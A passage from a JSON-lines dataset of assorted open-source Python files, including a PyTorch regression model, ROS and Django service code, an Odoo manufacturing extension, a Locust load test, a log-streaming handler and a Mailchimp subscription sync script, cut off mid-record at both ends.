operator == '2':\r\n del_user()\r\n elif operator == '3':\r\n modify_user()\r\n elif operator == '4':\r\n search_user()\r\n elif operator == '5':\r\n show_all()\r\n elif operator == '6':\r\n is_sure = exit_system()\r\n if is_sure:\r\n break\r\n else:\r\n print('您输入的不合法,请重新输入')\r\n\r\n\r\nif __name__ == '__main__':\r\n start()\r\n","sub_path":"Python工程师/1 Python入门/Day16-名片管理系统/01-代码/05-名片管理系统(修改用户).py","file_name":"05-名片管理系统(修改用户).py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309158776","text":"\n\nfrom xai.brain.wordbase.nouns._cornice import _CORNICE\n\n#calss header\nclass _CORNICES(_CORNICE, ):\n\tdef __init__(self,): \n\t\t_CORNICE.__init__(self)\n\t\tself.name = \"CORNICES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"cornice\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_cornices.py","file_name":"_cornices.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"543822612","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport math\nfrom dataloader import *\nfrom utility import *\n\n\nclass Net(nn.Module):\n def __init__(self, n_feature, n_hidden1, n_hidden2, n_hidden3, n_hidden4, n_hidden5, n_hidden6, n_hidden7,\n n_hidden8, n_hidden9, n_hidden10, n_hidden11, n_output):\n super(Net, self).__init__()\n self.hidden1 = nn.Linear(n_feature, n_hidden1)\n self.hidden2 = nn.Linear(n_hidden1, n_hidden2)\n self.hidden3 = nn.Linear(n_hidden2, n_hidden3)\n self.hidden4 = nn.Linear(n_hidden3, n_hidden4)\n self.hidden5 = nn.Linear(n_hidden4, n_hidden5)\n self.hidden6 = nn.Linear(n_hidden5, n_hidden6)\n self.hidden7 = nn.Linear(n_hidden6, n_hidden7)\n self.hidden8 = nn.Linear(n_hidden7, n_hidden8)\n self.hidden9 = nn.Linear(n_hidden8, n_hidden9)\n self.hidden10 = nn.Linear(n_hidden9, n_hidden10)\n self.hidden11 = nn.Linear(n_hidden10, n_hidden11)\n # self.hidden12 = nn.Linear(n_hidden11, n_hidden12)\n self.out = nn.Linear(n_hidden11, n_output)\n\n def forward(self, x):\n x = F.relu(self.hidden1(x))\n x = F.relu(self.hidden2(x))\n x = F.relu(self.hidden3(x))\n x = F.relu(self.hidden4(x))\n x = F.relu(self.hidden5(x))\n x = F.relu(self.hidden6(x))\n x = F.relu(self.hidden7(x))\n x = F.relu(self.hidden8(x))\n x = F.relu(self.hidden9(x))\n x = F.relu(self.hidden10(x))\n x = F.relu(self.hidden11(x))\n # x = F.relu(self.hidden12(x))\n return self.out(x)\n\n\ndef main():\n import os\n home = os.path.expanduser(\"~\")\n data_temp = \"compDelta1-7.txt\"\n data_path = os.path.join(home, data_temp)\n model_temp = \"deltaRegresssModel1-7\"\n model_name = model_temp + \".txt\"\n\n model = Net(14, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 1)\n # torch.save(model.state_dict(), model_name)\n print(\"done\")\n\n data = Data(data_path, [1, 2, 3, 4, 5, 6, 7], 11520)\n print(\"loading\", data_path)\n data.load()\n print(\"done.\")\n\n device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)\n # loss_fn = nn.CrossEntropyLoss()\n loss_fn = my_loss\n # loss_fn = nn.MSELoss()\n\n # if torch.cuda.device_count() > 1:\n # \tprint(torch.cuda.device_count(), \"GPUs\")\n # model = nn.DataParallel(model)\n\n model.to(device)\n\n # print(\"loading data ...\")\n # features, labels = readSplitPDB(data_name, [1,2,3,4,5,6,7], 
split, nth)\n # features = features.to(device)\n # labels = labels.to(device)\n # print(\"done\")\n\n data_size = len(data.label)\n num_batches = data_size // data.batch_size\n num_batches = 100\n\n for epoch in range(1):\n for i in range(num_batches):\n x, y = data.get_batch()\n x = x.to(device)\n y = y.to(device)\n out = model(x).squeeze()\n loss = loss_fn(out, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if i % 10 == 0:\n # torch.save(model.state_dict(), model_name)\n print(loss, i)\n data.reshuffle()\n\n\n# for i in range(1000000000):\n# \tout = model(features)\n# \tloss = loss_fn(out, labels)\n# \toptimizer.zero_grad()\n# \tloss.backward()\n# \toptimizer.step()\n# \tif i % 1000 == 0:\n# \t\ttorch.save(model.state_dict(), model_name)\n# \t\tprint(loss, i)\n\n# output = model(x)\n# _ , prediction = torch.max(output, 1)\n# accu = getAccuracy(prediction, y)\n# print(accu)\n# print(prediction == y)\n\n# torch.save(model.state_dict(), \"test.txt\")\n# model = model.to('cpu')\n# torch.save(model.state_dict(), \"modelcpu.txt\")\n# for i in range(len(temp)):\n# \tprint(temp[i])\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"regress.py","file_name":"regress.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"563687753","text":"import sys\n\ntry:\n import rospy\nexcept ImportError:\n print(\n \"Unable to load the ROS support. You might want to run with --no-ros\"\n \" to use KnowledgeCore without ROS support enabled.\"\n )\n sys.exit(1)\n\nimport json\n\nfrom knowledge_core.exceptions import KbServerError\n\nfrom knowledge_core.srv import Manage, Revise, Query, Sparql\nfrom std_msgs.msg import String\n\n\nclass KnowledgeCoreROS:\n def __init__(self, kb):\n self.kb = kb\n\n rospy.init_node(\"knowledge_core\", disable_signals=True)\n self.services = {\n \"manage\": rospy.Service(\"kb/manage\", Manage, self.handle_manage),\n \"revise\": rospy.Service(\"kb/revise\", Revise, self.handle_revise),\n \"query\": rospy.Service(\"kb/query\", Query, self.handle_query),\n \"sparql\": rospy.Service(\"kb/sparql\", Sparql, self.handle_sparql),\n }\n\n self.update_sub = rospy.Subscriber(\"/kb/add_fact\", String, self.on_update_fact)\n self.retract_sub = rospy.Subscriber(\n \"/kb/remove_fact\", String, self.on_retract_fact\n )\n\n rospy.loginfo(\n \"\"\"\nKnowledgeCore\n=============\n\nKnowledge base started.\n\nAvailable topics:\n- /kb/add_fact [std_msgs/String]\n- /kb/remove_fact [std_msgs/String]\n\nAvailable services:\n- /kb/manage [knowledge_core/Manage]\n- /kb/revise [knowledge_core/Revise]\n- /kb/query [knowledge_core/Query]\n- /kb/sparql [knowledge_core/Sparql]\n\n\nAvailable action servers:\n- /kb/events [knowledge_core/Events]\n\n\"\"\"\n )\n\n def handle_manage(self, req):\n\n from knowledge_core.srv import ManageResponse, ManageRequest\n\n try:\n if req.action == ManageRequest.CLEAR:\n self.kb.clear()\n return ManageResponse(success=True, error_msg=\"\")\n\n elif req.action == ManageRequest.LOAD:\n if len(req.parameters) != 1:\n return ManageResponse(\n success=False,\n error_msg=\"'load' expects 'parameters' to contain exactly one URI pointing to the ontology to load\",\n )\n self.kb.load(req.parameters[0], models=req.models)\n return ManageResponse(success=True, error_msg=\"\")\n\n elif req.action == ManageRequest.STATUS:\n status = {\n \"name\": self.kb.hello(),\n \"version\": self.kb.version(),\n \"reasoning_enabled\": self.kb.reasoner_enabled,\n }\n return 
ManageResponse(\n success=True, json=json.dumps(status), error_msg=\"\"\n )\n else:\n return ManageResponse(\n success=False, error_msg=\"Unknown 'manage' action: %s\" % req.action\n )\n except KbServerError as kbe:\n return ManageResponse(success=False, error_msg=str(kbe))\n\n def handle_revise(self, req):\n\n from knowledge_core.srv import ReviseResponse\n\n policy = {\"method\": req.method, \"models\": req.models}\n try:\n self.kb.revise(req.statements, policy)\n\n return ReviseResponse(success=True, error_msg=\"\")\n except KbServerError as kbe:\n return ReviseResponse(success=False, error_msg=str(kbe))\n\n def handle_query(self, req):\n\n from knowledge_core.srv import QueryResponse\n\n try:\n res = self.kb.find(req.patterns, req.vars, req.models)\n return QueryResponse(success=True, error_msg=\"\", json=json.dumps(res))\n except KbServerError as kbe:\n return QueryResponse(success=False, error_msg=str(kbe))\n\n def handle_sparql(self, req):\n\n from knowledge_core.srv import SparqlResponse\n\n try:\n res = self.kb.sparql(req.query, req.models)\n return SparqlResponse(success=True, error_msg=\"\", json=json.dumps(res))\n except KbServerError as kbe:\n return SparqlResponse(success=False, error_msg=str(kbe))\n\n def on_update_fact(self, msg):\n self.kb.update([msg.data])\n\n def on_retract_fact(self, msg):\n self.kb.remove([msg.data])\n\n def shutdown(self):\n\n rospy.signal_shutdown(\"KnowledgeCore closing\")\n","sub_path":"src/knowledge_core/knowledge_core_ros.py","file_name":"knowledge_core_ros.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"222924525","text":"from django.conf.urls import url, include\nfrom api.models import Post\nfrom rest_framework import routers, serializers, viewsets\nfrom . import views\nfrom rest_framework_jwt.views import obtain_jwt_token\n\n# Serializers define the API representation.\nclass PostSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Post\n fields = ('id', 'title', 'content', 'published_date', 'status')\n\n# ViewSets define the view behavior.\nclass PostViewSet(viewsets.ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n\n# Routers provide an easy way of automatically determining the URL conf.\nrouter = routers.DefaultRouter()\nrouter.register(r'posts', PostViewSet)\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^$', views.index, name='index'),\n url(r'^api-token-auth/', obtain_jwt_token),\n\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"526400472","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models\n\n\nclass MrpProduction(models.Model):\n _inherit = 'mrp.production'\n\n @api.model\n def _compute_default_routing(self):\n for production in self:\n if production.bom_id.routing_id.operation_ids:\n production.routing_id = production.bom_id.routing_id.id\n else:\n production.routing_id = False\n\n routing_id = fields.Many2one(\n 'mrp.routing', string='Routing', default=_compute_default_routing,\n help=\"The list of operations (list of work centers) to produce the finished product. 
The routing \"\n \"is mainly used to compute work center costs during operations and to plan future loads on \"\n \"work centers based on production planning.\")\n\n inventory_posted = fields.Boolean('Inventory posted', default=False)\n\n bom_id = fields.Many2one(\n 'mrp.bom', 'Bill of Material', track_visibility='onchange',\n readonly=True, states={'confirmed': [('readonly', False)]},\n help=\"Bill of Materials allow you to define the list of required raw materials to make a finished product.\")\n\n picking_type_id = fields.Many2one(\n 'stock.picking.type', 'Operation Type', track_visibility='onchange',\n default=lambda self: self._get_default_picking_type(), required=True)\n\n @api.multi\n def post_inventory(self):\n res = super(MrpProduction, self).post_inventory()\n for order in self:\n order.inventory_posted = True\n return res\n\n @api.onchange('bom_id')\n def change_route(self):\n for production in self:\n if production.bom_id.routing_id.operation_ids:\n production.routing_id = production.bom_id.routing_id.id\n else:\n production.routing_id = False\n\n @api.multi\n def write(self, values):\n res = super(MrpProduction, self).write(values)\n for order in self:\n if 'bom_id' in values or 'picking_type_id' in values:\n self.move_raw_ids._action_cancel()\n self.move_finished_ids._action_cancel()\n self.move_raw_ids.unlink()\n self.move_finished_ids.unlink()\n self.picking_ids.action_cancel()\n self._generate_moves()\n\n elif 'product_qty' in values and 'bom_id' not in values and 'picking_type_id' not in values:\n for picking in order.picking_ids:\n for move in picking.move_ids_without_package:\n # finished product\n if move.product_id == order.product_id:\n if order.bom_id.product_qty == 1:\n move.write({'product_uom_qty': values['product_qty']})\n elif order.bom_id.product_qty > 1:\n move.write({'product_uom_qty': values['product_qty'] / order.bom_id.product_qty})\n # component\n for bom_line in order.bom_id.bom_line_ids:\n if bom_line.product_id == move.product_id:\n if order.bom_id.product_qty == 1:\n move.write({'product_uom_qty': values['product_qty'] * bom_line.product_qty})\n elif order.bom_id.product_qty > 1:\n move.write({'product_uom_qty': (values[\n 'product_qty'] * bom_line.product_qty) / order.bom_id.product_qty})\n\n return res\n","sub_path":"bi_mrp_customization/models/mrp_production_inherit.py","file_name":"mrp_production_inherit.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"577411636","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom isthai import isThai\nimport PyICU\n# ตัดคำภาษาไทย\ndef segment(txt):\n \"\"\"รับค่า ''str'' คืนค่าออกมาเป็น ''list'' ที่ได้มาจากการตัดคำโดย ICU\"\"\"\n bd = PyICU.BreakIterator.createWordInstance(PyICU.Locale(\"th\"))\n bd.setText(txt)\n lastPos = bd.first()\n retTxt = \"\"\n try:\n while(1):\n currentPos = next(bd)\n retTxt += txt[lastPos:currentPos]\n if(isThai(txt[currentPos-1])):\n if(currentPos < len(txt)):\n if(isThai(txt[currentPos])):\n retTxt += ','\n lastPos = currentPos\n except StopIteration:\n pass\n return retTxt.split(',')\nif __name__ == \"__main__\":\n\tprint(segment('ทดสอบระบบตัดคำด้วยไอซียู'))\n","sub_path":"pythainlp/segment/pyicu.py","file_name":"pyicu.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640106951","text":"from scipy.sparse.csgraph import shortest_path\nimport numpy 
as np\nN,M=map(int,input().split())\nabc = [tuple(map(int,input().split())) for i in range(M)]\ng = [[10**9]*N for i in range(N)]\nfor a,b,c in abc:\n    a,b = a-1,b-1\n    g[a][b]=c\n    g[b][a]=c\ng = np.array(g)\nG,P=shortest_path(g,return_predecessors=True)\nans=set()\nfor i in range(N):\n    for j in range(N):\n        # -9999 marks no predecessor; node 0 is a valid predecessor, so test >= 0\n        if P[i][j]>=0 and (P[i][j],j) not in ans:\n            ans.add((j,P[i][j]))\n\nprint(M-len(ans))","sub_path":"Python_codes/p03837/s665916474.py","file_name":"s665916474.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"89153113","text":"from locust import HttpUser, task, events, between\nfrom dotenv import load_dotenv\nimport os, random\n\nload_dotenv() # load env variables\n\n@events.test_start.add_listener\ndef on_test_start(environment, **kwargs):\n    print(\"A new test is starting\")\n\n@events.test_stop.add_listener\ndef on_test_stop(environment, **kwargs):\n    print(\"A new test is ending\")\n\nclass MutlipleSurveyUser(HttpUser):\n    rw = int(os.getenv('multiple_survey_render_weight')) if os.getenv('multiple_survey_render_weight') else 1\n    sw1 = int(os.getenv('mutiple_survey1_submit_weight')) if os.getenv('mutiple_survey1_submit_weight') else 1\n    sw2 = int(os.getenv('mutiple_survey2_submit_weight')) if os.getenv('mutiple_survey2_submit_weight') else 1\n    sw3 = int(os.getenv('mutiple_survey3_submit_weight')) if os.getenv('mutiple_survey3_submit_weight') else 1\n    sw4 = int(os.getenv('mutiple_survey4_submit_weight')) if os.getenv('mutiple_survey4_submit_weight') else 1\n    \n    params = {\n        'random_int': 5,\n        'random_string': 'abcdef',\n        'random_name': 'Jeff',\n        'submit-action': 'submit-btn-saverecord'\n    }\n\n    def submit(self, uri, name):\n        with self.client.post(uri, self.params, catch_response=True, name=name) as response: \n            if response.status_code == 200:\n                response.success()\n            else:\n                # locust's failure() requires a reason argument\n                response.failure(\"unexpected status code %s\" % response.status_code)\n\n    @task(sw1)\n    def submit_public_survey1(self):\n        print(\"submitting multiple survey ... \")\n        self.submit(os.getenv('multiple_public_survey_url1'), 'Multiple Survey 1 submission')\n    \n    @task(sw2)\n    def submit_public_survey2(self):\n        print(\"submitting multiple survey 2 ... \")\n        self.submit(os.getenv('multiple_public_survey_url2'), 'Multiple Survey 2 submission')\n\n    \n    @task(sw3)\n    def submit_public_survey3(self):\n        print(\"submitting multiple survey 3 ... \")\n        self.submit(os.getenv('multiple_public_survey_url3'), 'Multiple Survey 3 submission')\n\n\n    @task(sw4)\n    def submit_public_survey4(self):\n        print(\"submitting multiple survey 4 ... \")\n        self.submit(os.getenv('multiple_public_survey_url4'), 'Multiple Survey 4 submission')\n\n    @task(rw) # render 5 times as often\n    def render_public_survey(self):\n        choices = [\n            os.getenv('multiple_public_survey_url1'),\n            os.getenv('multiple_public_survey_url2'),\n            os.getenv('multiple_public_survey_url3'),\n            os.getenv('multiple_public_survey_url4')\n        ]\n        \n        choice = random.randint(0,3)\n        \n        print(f\"rendering multiple survey ... 
{choice + 1}\")\n \n self.client.get(choices[choice], name='Multiple survey render')\n\n wait_time = between(1, 3)","sub_path":"locus_scripts/MutlipleSurveys.py","file_name":"MutlipleSurveys.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"137528203","text":"class TreeNode:\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef find(value, this_node):\n if this_node is None:\n return None\n elif this_node.value == value:\n return this_node\n else:\n res = find(value, this_node.left)\n if res is None:\n res = find(value, this_node.right)\n return res\n\n\nn, root_value = [int(x) for x in input().split()]\ninfo = [] # 结点信息\nfor i in range(n):\n info.append([int(x) for x in input().split()])\nroot = TreeNode(root_value)\n\n\ndef make_tree(node):\n lch = 0\n rch = 0\n for each in info:\n if each[0] == node.value:\n lch = each[1]\n rch = each[2]\n break\n if lch != 0:\n node.left = make_tree(TreeNode(lch))\n if rch != 0:\n node.right = make_tree(TreeNode(rch))\n return node\n\n\ndef dfs(value1, value2, node):\n if node is None:\n return None\n elif node.value == value1 or node.value == value2:\n return node\n elif find(value1, node.left) is not None and find(value2, node.left) is not None:\n return dfs(value1, value2, node.left)\n elif find(value1, node.right) is not None and find(value2, node.right) is not None:\n return dfs(value1, value2, node.right)\n else:\n return node\n\n\nroot = make_tree(root)\nm = int(input())\nans = []\nfor i in range(m):\n node1, node2 = [int(x) for x in input().split()]\n ans.append(dfs(node1, node2, root).value)\nfor i in ans:\n print(i)\n","sub_path":"Code/CodeRecords/2302/60675/310084.py","file_name":"310084.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"416657564","text":"\"\"\"\n Server Side Event Handler for emitting messages from tailed log files.\n\"\"\"\n\n# encoding: utf-8\nimport uuid\nimport tornado.web\nimport tornado.escape\nimport os as _os\nimport six\n\nimport graphlab.deploy\n\nSSE_HEADERS = (\n ('Content-Type','text/event-stream; charset=utf-8'),\n ('Cache-Control','no-cache'),\n ('Connection','keep-alive'),\n ('Access-Control-Allow-Origin', '*'),\n)\n\n# SSE \"protocol\" is described here: http://mzl.la/UPFyxY\nclass ServerSentEvent(object):\n\n def __init__(self, data, event=None, id=None):\n self.data = data\n self.event = event\n self.id = id\n self.desc_map = {\n self.data : \"data\",\n self.event : \"event\",\n self.id : \"id\"\n }\n\n def encode(self):\n if not self.data:\n return \"\"\n lines = [\"%s: %s\" % (v, k)\n for k, v in six.iteritems(self.desc_map) if k]\n\n return \"%s\\n\\n\" % \"\\n\".join(lines)\n\nclass SSEHandler(tornado.web.RequestHandler):\n \"\"\"\n URL route expects an object id to be passed in as the first parameter\n to the get handler\n\n specified object id is validated before stream connection is started\n \"\"\"\n\n _connections = {}\n _source = None\n\n def __init__(self, application, request, **kwargs):\n super(SSEHandler, self).__init__(application, request, **kwargs)\n self.stream = request.connection.stream\n self._closed = False\n\n def set_default_headers(self):\n for name, value in SSE_HEADERS:\n self.set_header(name, value)\n\n def get_class(self):\n return self.__class__\n\n def get_source(self, *args):\n return None\n\n def listen(self, 
source):\n return None\n\n @tornado.web.asynchronous\n def get(self, obj_id):\n # validate id\n self._source = self.get_source(obj_id)\n # abort connection if invalid id\n if not self._source:\n self.set_status(403)\n self.finish()\n else:\n # Sending the standard headers: open event\n self.on_open()\n\n def on_open(self, *args, **kwargs):\n \"\"\" Invoked for a new connection opened. \"\"\"\n self.listen(self._source)\n\n def on_close(self):\n \"\"\" Invoked when the connection for this instance is closed. \"\"\"\n pass\n\n def on_connection_close(self):\n \"\"\" Closes the connection for this instance \"\"\"\n self.on_close()\n self.stream.close()\n\n def send_message(self, data):\n \"\"\" Sends a message to all live connections \"\"\"\n msg_id = str(uuid.uuid4())\n event = 'message'\n\n sse = ServerSentEvent(data, event, msg_id)\n message = sse.encode()\n\n self.on_message(message)\n\n def on_message(self, message):\n self.write(message)\n self.flush()\n\n\nclass LogSSEHandler(SSEHandler):\n \"\"\"\n Stream messages from log file as it is being written to\n \"\"\"\n line_terminators = ('\\r\\n', '\\n', '\\r')\n\n def __init__(self, application, request, **kwargs):\n super(LogSSEHandler, self).__init__(application, request, **kwargs)\n self._file_handle = None\n self._periodic_task = None\n\n # return the job log file path, if available\n # otherwise, return None. Connection will be closed.\n def get_source(self, job_id):\n try:\n job_obj = graphlab.deploy.jobs[job_id]\n except KeyError:\n return None\n\n job_log_file = job_obj.get_log_file_path()\n return job_log_file\n\n\n # close file handle and periodic callbacks\n def on_close(self):\n \"\"\" Invoked when the connection for this instance is closed. \"\"\"\n # close log file if it has been opened\n if self._file_handle is not None:\n try:\n self._file_handle.close()\n except:\n pass\n # end periodic callback if it has been created\n if self._periodic_task is not None:\n try:\n self._periodic_task.stop()\n except:\n pass\n\n # asynchronous writes of log file messages.\n # generator exits when log file is closed and all\n # messages have been sent\n @tornado.web.asynchronous\n def listen(self, log_file_path):\n for line in self.__last_lines_of_file(log_file_path, 1000):\n self.send_message(line)\n\n self.__open_log_file_at_end(log_file_path)\n\n #start periodic callback to tail file\n self._periodic_task = tornado.ioloop.PeriodicCallback(self.__follow_file_async, 3000)\n self._periodic_task.start()\n\n def __open_log_file_at_end(self, log_file_path):\n fsize = _os.stat(log_file_path).st_size\n self._file_handle = open(log_file_path, 'rb')\n self._file_handle.seek(fsize)\n\n # generator that yields\n # the last 1000 lines of a log file\n # all following lines until the file is terminated\n @tornado.web.asynchronous\n def __last_lines_of_file(self, log_file, lines=1000):\n bufsize = 8192\n fsize = _os.stat(log_file).st_size\n\n with open(log_file, 'rb') as f:\n #limit buffer size to file size\n if bufsize > fsize:\n bufsize = fsize-1\n position = fsize\n data = []\n while True:\n position -= bufsize\n bufsize *= 2\n if position < 0:\n position = 0\n f.seek(position)\n data = f.readlines()\n # quit reading if we have read enough lines\n # or we are at the beginning of the file\n if len(data) >= lines or position == 0 or bufsize > 131072:\n break\n\n # send out last (up to) 1000 lines\n for line in data[-lines:]:\n yield line\n\n def __follow_file_async(self):\n ### start tailing log\n trailing = True\n while True:\n where = 
self._file_handle.tell()\n line = self._file_handle.readline()\n if line:\n if trailing and line in self.line_terminators:\n # This is just the line terminator added to the end of the file\n # before a new line, ignore.\n trailing = False\n continue\n\n if line[-1] in self.line_terminators:\n line = line[:-1]\n if line[-1:] == '\\r\\n' and '\\r\\n' in self.line_terminators:\n # found crlf\n line = line[:-1]\n\n trailing = False\n # send out new lines\n self.send_message(line)\n else:\n # preserve file position and return\n self._file_handle.seek(where)\n break\n","sub_path":"env/lib/python2.7/site-packages/graphlab/canvas/log_stream_handler.py","file_name":"log_stream_handler.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"377294348","text":"\"\"\"\nSubscribe all registered OSF users to the 'Open Science Framework General'\nmailing list on mailchimp. From the API docs:\n\n1. Grab the users to be updated or created\n2. For each user's status, sort them into two batches:\n Users to be subscribed or updated\n Users to be unsubscribed\n3. For each of those batches, use:\n listBatchSubscribe() to add new or update existing users on your List\n listBatchUnsubscribe() to remove old users from your List\n\nhttp://apidocs.mailchimp.com/api/how-to/sync-you-to-mailchimp.php\n\nLog:\n\n Run on production by SL at 23:11 EST. 6680 users' `mailing_records` fields were\n updated. 6674 users were subscribed to the Open Science Framework General\n mailing list via the Mailchimp API. Running the migration the first time\n failed due to a user having an GUID record with an incorrect referent (pointing\n to the `osffile` collection rather than `user`). This GUID object was manually\n modified. 
The migration was run again, and it finished successfully.\n\"\"\"\nimport sys\n\nfrom modularodm import Q\nfrom framework.auth.core import User\nfrom website import mailchimp_utils, settings\nfrom website.app import init_app\nfrom tests.base import OsfTestCase\nfrom tests.factories import UserFactory, UnconfirmedUserFactory\nfrom nose.tools import *\nimport mock\n\nimport logging\nfrom scripts import utils as script_utils\n\nlogger = logging.getLogger(__name__)\nGENERAL_LIST = settings.MAILCHIMP_GENERAL_LIST\n\n\ndef main(dry=True):\n # Set up storage backends\n init_app(routes=False)\n users = list(get_users())\n update_users(users, dry=dry)\n subscribe_users(users, dry=dry) # confirm list name before running script\n\ndef update_users(users, dry=True):\n for user in get_users():\n if not dry:\n if user.mailchimp_mailing_lists is None:\n user.mailchimp_mailing_lists = {}\n user.mailchimp_mailing_lists[GENERAL_LIST] = True\n user.save()\n logger.info('User {}\\'s mailing_lists dict updated.'.format(user._id))\n\ndef get_users():\n \"\"\"Get all users who will be subscribed to the OSF General mailing list.\"\"\"\n # Exclude unconfirmed and unregistered users\n # NOTE: Unclaimed and unconfirmed users have is_registered=False\n return User.find(Q('is_registered', 'eq', True))\n\n\ndef serialize_user(user):\n \"\"\"Return the formatted dict expected by the mailchimp batch subscribe endpoint.\n https://apidocs.mailchimp.com/api/2.0/lists/batch-subscribe.php\n \"\"\"\n return {'email': {'email': user.username},\n 'email_type': 'html',\n 'merge_vars': {\n 'fname': user.given_name,\n 'lname': user.family_name}\n }\n\n\ndef subscribe_users(users, dry=True):\n serialized = [serialize_user(user) for user in users]\n m = mailchimp_utils.get_mailchimp_api()\n list_id = mailchimp_utils.get_list_id_from_name(list_name=GENERAL_LIST)\n logger.info('Subscribing {0} users to {1}...'.format(len(users), GENERAL_LIST))\n if not dry:\n subscribe_info = m.lists.batch_subscribe(\n id=list_id,\n batch=serialized,\n double_optin=False,\n update_existing=True\n )\n logger.info('{n} users subscribed'.format(n=subscribe_info['add_count']))\n\n\n\nclass TestSyncEmail(OsfTestCase):\n\n @classmethod\n def setUpClass(cls):\n super(TestSyncEmail, cls).setUpClass()\n # Cache real mailchimp API key\n cls._mailchimp_api_key = settings.MAILCHIMP_API_KEY\n # use fake api key for tests\n settings.MAILCHIMP_API_KEY = 'pizza-pie'\n\n @classmethod\n def tearDownClass(cls):\n super(TestSyncEmail, cls).tearDownClass()\n # restore API key\n settings.MAILCHIMP_API_KEY = cls._mailchimp_api_key\n cls._mailchimp_api_key = None\n\n def setUp(self):\n super(TestSyncEmail, self).setUp()\n self.user = UserFactory()\n self.unconfirmed = UnconfirmedUserFactory()\n\n def test_update_users(self):\n users = get_users()\n assert_false(self.user.mailchimp_mailing_lists)\n\n update_users(users, dry=False)\n\n assert_equal(self.user.mailchimp_mailing_lists, {'Open Science Framework General': True})\n\n def test_serialize_user(self):\n user = UserFactory()\n result = serialize_user(user)\n assert_equal(result, {'email': {'email': user.username},\n 'email_type': 'html',\n 'merge_vars': {\n 'fname': user.given_name,\n 'lname': user.family_name}\n })\n\n def test_get_users(self):\n users = list(get_users())\n assert_equal(len(users), 1)\n assert_not_in(self.unconfirmed, users)\n assert_equal(users, [self.user])\n\n @mock.patch('website.mailchimp_utils.mailchimp.Lists.list')\n @mock.patch('website.mailchimp_utils.mailchimp.Lists.batch_subscribe')\n def 
test_subscribe_users_called_with_correct_arguments(self, mock_subscribe, mock_list):\n mock_list.return_value = {'data': [{'id': 1, 'list_name': GENERAL_LIST}]}\n list_id = mailchimp_utils.get_list_id_from_name(GENERAL_LIST)\n\n users = list(get_users())\n\n subscribe_users(users, dry=False)\n\n serialized = [serialize_user(u) for u in users]\n mock_subscribe.assert_called_with(id=list_id,\n batch=serialized,\n double_optin=False,\n update_existing=True\n )\n\n @mock.patch('website.mailchimp_utils.mailchimp.Lists.list')\n @mock.patch('website.mailchimp_utils.mailchimp.Lists.batch_subscribe')\n def test_main(self, mock_subscribe, mock_list):\n mock_list.return_value = {'data': [{'id': 1, 'list_name': GENERAL_LIST}]}\n\n assert_false(self.user.mailchimp_mailing_lists)\n\n main(dry=False)\n\n assert_true(self.user.mailchimp_mailing_lists[GENERAL_LIST])\n mock_subscribe.assert_called()\n\n\nif __name__ == '__main__':\n script_utils.add_file_logger(logger, __file__)\n main(dry='dry' in sys.argv)\n","sub_path":"scripts/sync_email.py","file_name":"sync_email.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"246945876","text":"# -*- coding: utf-8 -*-\nfrom zouxiu_client import *\nfrom const import *\nfrom xml.dom import minidom\nimport time\nimport json\nimport functools\nimport traceback\n\n#python 2.7.9\n\ndef get_all_products(zouxiu_client):\n response = zouxiu_client.getitem(data={ \"pageSize\":100 })\n response_dict = json.loads(response, encoding=\"utf-8\")\n if response_dict['errorCode'] == '0':\n data = response_dict['data']\n total = data['total']\n loop = total/100\n residue = total%100\n total_products_list = []\n for i in range(1, loop+1+(1 if residue!=0 else 0)):\n response = zouxiu_client.getitem(data={ \"pageSize\":100, \"pageNo\":i })\n response_dict = json.loads(response, encoding=\"utf-8\")\n data = response_dict['data']\n item_list = data['list']\n total_products_list += item_list\n return total_products_list\n\n\ndef get_or_empty_str(node, tag_name):\n try:\n return node.getElementsByTagName(tag_name)[0].firstChild.data\n except:\n return \"\"\n\ndef get_image_str(brand, model, material, color):\n try:\n brand_no_str = BRAND_ID_DICT[brand]\n except:\n brand_no_str = ''\n url_str = 'http://img.yvogue.hk/pimg/pl/' + 